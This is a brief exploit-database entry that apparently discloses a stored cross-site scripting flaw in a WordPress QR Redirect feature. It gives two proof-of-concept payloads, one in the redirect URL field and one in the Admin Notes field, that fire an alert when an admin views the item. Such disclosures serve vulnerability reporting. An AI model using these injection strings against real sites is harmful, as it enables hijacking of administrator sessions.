Share 
## https://sploitus.com/exploit?id=WPEX-ID:0D422397-69FF-4D05-AAFA-7A572E460E5F
As a contributor, create/edit a "QR Redirect" and set the following fields:

"URL to Redirect to": https://example.com/#" style="animation-name:rotation" onanimationend="alert(/XSS-URL/)//
"Admin Notes": </textarea><script>alert(/XSS-admin-notes/)</script>

The XSS will be triggered when any user access the QR Redirect (for example an admin reviewing it)